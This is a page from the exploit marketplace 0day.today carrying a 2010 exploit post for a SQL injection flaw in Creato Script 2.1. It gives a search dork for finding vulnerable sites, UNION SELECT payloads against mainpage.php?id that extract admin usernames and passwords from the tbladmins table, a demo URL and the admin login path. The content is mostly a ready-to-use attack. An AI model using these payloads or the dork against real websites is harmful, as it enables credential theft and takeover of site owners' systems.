[ 授权 ] [ 注册 ] [ 恢复账号 ]
联系我们
你可以由此方式联系我们:
0day.today   漏洞利用市场和0day漏洞利用数据库

Creato Script SQL Injection Vulnerability

作者
Mr.P3rfekT
风险
[
安全风险级别 - 未分类
]
0day-ID
0day-ID-12462
类别
web applications
添加日期
30-05-2010
平台
php
=========================================
Creato Script SQL Injection Vulnerability
=========================================


# Title:  Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site:  http://www.creato.biz
# Tested on Lunix
# CVE : N/A
    
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "
 
 
# Helllo Allz.
    
    
# Exploit :
    
http://[site]/mainpage.php?id={SQLi}
 
 
 
# Poc Username:
 
union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
 
# Poc Password:
 
# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
 
# Demo:
 
 http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
  
# Admin Login
 
 
# http://[site]/admun/login.php
 
# ./done.
   
    
####################################################################



#  0day.today [2024-07-02]  #